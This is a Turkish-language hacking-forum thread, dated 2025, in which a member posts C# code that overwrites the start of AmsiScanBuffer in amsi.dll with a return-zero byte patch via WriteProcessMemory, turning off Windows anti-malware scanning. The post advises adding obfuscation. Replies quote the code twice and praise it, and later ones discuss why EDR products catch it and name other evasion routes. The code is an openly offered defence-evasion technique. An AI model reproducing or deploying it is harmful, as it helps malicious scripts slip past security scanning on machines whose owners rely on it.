C# Dilinde AMSI Bypass Örneği

slowbaskan123 · 24 May 2025

Uzun bir aradan sonra herkese merhaba.
Bugün, C# dilinde AMSI yani Anti Malware Tarama Sistemi için bir Bypass örneği yazacağız.
Öncelikle AMSI nedir ve bunu neden bypass'lamak istiyoruz bunu öğrenmek için, aşağıdaki konuya bakabilirsiniz;

Windows Anti Malware Tarama Sistemi (AMSI) Nedir?

Kütüphanelerimiz;

using System;
using System.Runtime.InteropServices;

Koda geçelim;

Öncelikle AMSI sistemini bellek tarafında bypass edeceğiz, bu yüzden Windows API'lerini kullanıyoruz.

C#:

class api
{
    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern IntPtr GetModuleHandle(string lpModuleName);

    [DllImport("kernel32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
    private static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesWritten);

    [DllImport("kernel32.dll")]
    private static extern IntPtr GetCurrentProcess();

Kullanacağımız API'ler bunlar, amacımız; AMSI sistemini patch'leyerek geçmek.
Şimdi, bypass fonksiyonumuzu yazalım;

C#:

    public static bool bypass()
    {
        try
        {
            //işlemler amsi.dll üzerinde gerçekleşecek
            //api fonksiyonlarından birini burada kullanıyoruz
            IntPtr dll = GetModuleHandle("amsi.dll");
            if (dll == IntPtr.Zero)
            //eğer dll 0 ise bulunamadı mesajı veriyoruz
            {
                Console.WriteLine("dll yok");
                return false;
            }

            //olay burada amsiscanbuffer adresini alacağız
            //bu fonksiyonu patchleyerek bypass edeceğiz
            IntPtr scnbufferadresi = GetProcAddress(dll, "AmsiScanBuffer");
            if (scnbufferadresi == IntPtr.Zero)
            {
                Console.WriteLine("fonksiyon yookk");
                return false;
            }

            //patchlemek için assembly dilinde fonksiyonu sonlandıracağımız değerlr
            //64 bit sistemler için
            byte[] degerler = new byte[] { 0x48, 0x31, 0xC0, 0xC3 };
            // bu değerler alıntıdır

            //patch işlemi
            //scanbuffer fonksiyonunun başlangıcını değiştirerek taramayı kapat
            IntPtr degeri_yaz;
            bool aaa = WriteProcessMemory(GetCurrentProcess(), scnbufferadresi, degerler, degerler.Length, out degeri_yaz);
            if (!aaa)
            {
                Console.WriteLine("hata");
                return false;
            }
            return true;
        }
        catch
        {
            Console.WriteLine("hataaa");
            return false;
        }
    }

Kod bu kadar, tabii bunu geliştirmek için; Obfuscation gibi teknikler kullanmanız gerekiyor.

Saygılarımla

Kryzlo · 24 May 2025

Güzel, faydalı bir konu ellerinize sağlık.

Kurt_44 · 24 May 2025

slowbaskan123' Alıntı:

Uzun bir aradan sonra herkese merhaba.
Bugün, C# dilinde AMSI yani Anti Malware Tarama Sistemi için bir Bypass örneği yazacağız.
Öncelikle AMSI nedir ve bunu neden bypass'lamak istiyoruz bunu öğrenmek için, aşağıdaki konuya bakabilirsiniz;

Windows Anti Malware Tarama Sistemi (AMSI) Nedir?

Kütüphanelerimiz;

using System;
using System.Runtime.InteropServices;

Koda geçelim;

Öncelikle AMSI sistemini bellek tarafında bypass edeceğiz, bu yüzden Windows API'lerini kullanıyoruz.

C#:

class api
{
    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern IntPtr GetModuleHandle(string lpModuleName);

    [DllImport("kernel32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
    private static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesWritten);

    [DllImport("kernel32.dll")]
    private static extern IntPtr GetCurrentProcess();

Kullanacağımız API'ler bunlar, amacımız; AMSI sistemini patch'leyerek geçmek.
Şimdi, bypass fonksiyonumuzu yazalım;

C#:

    public static bool bypass()
    {
        try
        {
            //işlemler amsi.dll üzerinde gerçekleşecek
            //api fonksiyonlarından birini burada kullanıyoruz
            IntPtr dll = GetModuleHandle("amsi.dll");
            if (dll == IntPtr.Zero)
            //eğer dll 0 ise bulunamadı mesajı veriyoruz
            {
                Console.WriteLine("dll yok");
                return false;
            }

            //olay burada amsiscanbuffer adresini alacağız
            //bu fonksiyonu patchleyerek bypass edeceğiz
            IntPtr scnbufferadresi = GetProcAddress(dll, "AmsiScanBuffer");
            if (scnbufferadresi == IntPtr.Zero)
            {
                Console.WriteLine("fonksiyon yookk");
                return false;
            }

            //patchlemek için assembly dilinde fonksiyonu sonlandıracağımız değerlr
            //64 bit sistemler için
            byte[] degerler = new byte[] { 0x48, 0x31, 0xC0, 0xC3 };
            // bu değerler alıntıdır

            //patch işlemi
            //scanbuffer fonksiyonunun başlangıcını değiştirerek taramayı kapat
            IntPtr degeri_yaz;
            bool aaa = WriteProcessMemory(GetCurrentProcess(), scnbufferadresi, degerler, degerler.Length, out degeri_yaz);
            if (!aaa)
            {
                Console.WriteLine("hata");
                return false;
            }
            return true;
        }
        catch
        {
            Console.WriteLine("hataaa");
            return false;
        }
    }

Kod bu kadar, tabii bunu geliştirmek için; Obfuscation gibi teknikler ile geliştirmeniz gerekiyor.

Saygılarımla

Konunu gerçekten beğendim

. İşe yarar, kullanılabilecek, faydalı bilgilendirici konu olmuş

ATE$ · 24 May 2025

slowbaskan123' Alıntı:

Uzun bir aradan sonra herkese merhaba.
Bugün, C# dilinde AMSI yani Anti Malware Tarama Sistemi için bir Bypass örneği yazacağız.
Öncelikle AMSI nedir ve bunu neden bypass'lamak istiyoruz bunu öğrenmek için, aşağıdaki konuya bakabilirsiniz;

Windows Anti Malware Tarama Sistemi (AMSI) Nedir?

Kütüphanelerimiz;

using System;
using System.Runtime.InteropServices;

Koda geçelim;

Öncelikle AMSI sistemini bellek tarafında bypass edeceğiz, bu yüzden Windows API'lerini kullanıyoruz.

C#:

class api
{
    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern IntPtr GetModuleHandle(string lpModuleName);

    [DllImport("kernel32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
    private static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesWritten);

    [DllImport("kernel32.dll")]
    private static extern IntPtr GetCurrentProcess();

Kullanacağımız API'ler bunlar, amacımız; AMSI sistemini patch'leyerek geçmek.
Şimdi, bypass fonksiyonumuzu yazalım;

C#:

    public static bool bypass()
    {
        try
        {
            //işlemler amsi.dll üzerinde gerçekleşecek
            //api fonksiyonlarından birini burada kullanıyoruz
            IntPtr dll = GetModuleHandle("amsi.dll");
            if (dll == IntPtr.Zero)
            //eğer dll 0 ise bulunamadı mesajı veriyoruz
            {
                Console.WriteLine("dll yok");
                return false;
            }

            //olay burada amsiscanbuffer adresini alacağız
            //bu fonksiyonu patchleyerek bypass edeceğiz
            IntPtr scnbufferadresi = GetProcAddress(dll, "AmsiScanBuffer");
            if (scnbufferadresi == IntPtr.Zero)
            {
                Console.WriteLine("fonksiyon yookk");
                return false;
            }

            //patchlemek için assembly dilinde fonksiyonu sonlandıracağımız değerlr
            //64 bit sistemler için
            byte[] degerler = new byte[] { 0x48, 0x31, 0xC0, 0xC3 };
            // bu değerler alıntıdır

            //patch işlemi
            //scanbuffer fonksiyonunun başlangıcını değiştirerek taramayı kapat
            IntPtr degeri_yaz;
            bool aaa = WriteProcessMemory(GetCurrentProcess(), scnbufferadresi, degerler, degerler.Length, out degeri_yaz);
            if (!aaa)
            {
                Console.WriteLine("hata");
                return false;
            }
            return true;
        }
        catch
        {
            Console.WriteLine("hataaa");
            return false;
        }
    }

Kod bu kadar, tabii bunu geliştirmek için; Obfuscation gibi teknikler ile geliştirmeniz gerekiyor.

Saygılarımla

Ellerine sağlık, bir konuda değinmek istiyorum. Catch bloğu daha kapsamlı hata yakalama için kullanılıyor diye biliyorum. Farklı bir yöntem denenebilir catch yerine.

Kod biraz sinirli gibi

slowbaskan123 · 24 May 2025

Kryzlo' Alıntı:
Güzel, faydalı bir konu ellerinize sağlık.

Kurt_44' Alıntı:
Konunu gerçekten beğendim. İşe yarar, kullanılabilecek, faydalı bilgilendirici konu olmuş

Teşekkürler..

ATE$' Alıntı:
Ellerine sağlık, bir konuda değinmek istiyorum. Catch bloğu daha kapsamlı hata yakalama için kullanılıyor diye biliyorum. Farklı bir yöntem denenebilir catch yerine.

Kod biraz sinirli gibi

Teşekkürler, Farketmez kullanılır yine.

sametghack · 24 May 2025

Eline saglik hocam

Cellad1453 · 24 May 2025

Eline sağlık

BraveHeart98795 · 25 May 2025

Elinize sağlık hocam.

Fergus MacLeod · 25 May 2025

Patchleme garanti bir yöntem değil.
Zaten bu patcher çalışmadan AMSI patcherı tarar ve engelletir.

slowbaskan123 · 25 May 2025

sametghack68' Alıntı:
Eline saglik hocam

Cellad1453' Alıntı:
Eline sağlık

BraveHeart98795' Alıntı:
Elinize sağlık hocam.

Teşekkürler..

Fergus MacLeod' Alıntı:
Patchleme garanti bir yöntem değil.
Zaten bu patcher çalışmadan AMSI patcherı tarar ve engelletir.

Obfuscation gibi yöntemler kullanılabilir.

BlackDynamite · 25 May 2025

Eline sağlık gayet guzel kısa anlatım açıklayıcı

'Arstotzka · 10 Haz 2025

Bu kod AMSI bypass'layamaz.

BlackDynamite · 10 Haz 2025

'Arstotzka' Alıntı:
Bu kod AMSI bypass'layamaz.

Şimdi böyle birsey yazdınız ama neden ve ne gibi şeyler eklenirse bypass eder açıklarsanız daha iyi olur

'Arstotzka · 10 Haz 2025

BlackDynamite' Alıntı:
Şimdi böyle birsey yazdınız ama neden ve ne gibi şeyler eklenirse bypass eder açıklarsanız daha iyi olur

Çünkü çok basit bir örnek olmuş, Defender veya farklı AV ürünleri bu tarz amsi.dll maplendiği alandaki en ufak değişiklikte uyarı veriyor, obf edilse dahi Run-Time sırasında işlevsiz kalıyor.

Jusstthe · 10 Haz 2025

BlackDynamite' Alıntı:
Şimdi böyle birsey yazdınız ama neden ve ne gibi şeyler eklenirse bypass eder açıklarsanız daha iyi olur

Zararlı olmayan bir yazılım amsi.dll'deki fonksiyonlara yazma suretiyle müdahale etmez, yazma girişimi bir bypass'lama tekniğinin göstergesi. Elbette her güvenlik ürünü bu girişimi tespit etmiyor fakat kaliteli AV/EDR'ler bunu kolaylıkla edebiliyor

Jusstthe · 10 Haz 2025

Jusstthe' Alıntı:
Zararlı olmayan bir yazılım amsi.dll'deki fonksiyonlara yazma suretiyle müdahale etmez, yazma girişimi bir bypass'lama tekniğinin göstergesi. Elbette her güvenlik ürünü bu girişimi tespit etmiyor fakat kaliteli AV/EDR'ler bunu kolaylıkla edebiliyor

Patching yöntemi yerine programatik yollarla debugger bağlanıp thread'in context'i manipüle edilebilir veya amsi.dll'in yüklenmesi engellenebilir

C# Dilinde AMSI Bypass Örneği

slowbaskan123

Kıdemli Üye

Kryzlo

Anka Team

Kurt_44

Editör

ATE$

Merhum Üye

slowbaskan123

Kıdemli Üye

sametghack

Moderatör

Cellad1453

Katılımcı Üye

BraveHeart98795

Katılımcı Üye

Fergus MacLeod

Üye

slowbaskan123

Kıdemli Üye

BlackDynamite

Kıdemli Üye

'Arstotzka

Üye

BlackDynamite

Kıdemli Üye

'Arstotzka

Üye

Jusstthe

Katılımcı Üye

Jusstthe

Katılımcı Üye

Sosyal medya sayfalarımız